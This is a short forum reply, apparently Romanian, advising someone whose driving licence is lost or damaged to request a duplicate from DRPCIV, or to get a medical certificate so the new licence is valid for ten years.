  38. 2008 is the date the category was obtained, 2014 the date it was last replaced. In theory it should be valid until 2024. I think you just need to request a duplicate. https://www.drpciv.ro/document-details/permise/5ab13584fa4e9422012c2bab EDIT: From what it says there, the new document will be issued with the validity of the lost/damaged one. Given that only 2 years of validity remain, I for one would also get a medical certificate. That way you get 10 years of validity. You're rid of one worry and of paying another 90-100 lei in 2 years.
    1 point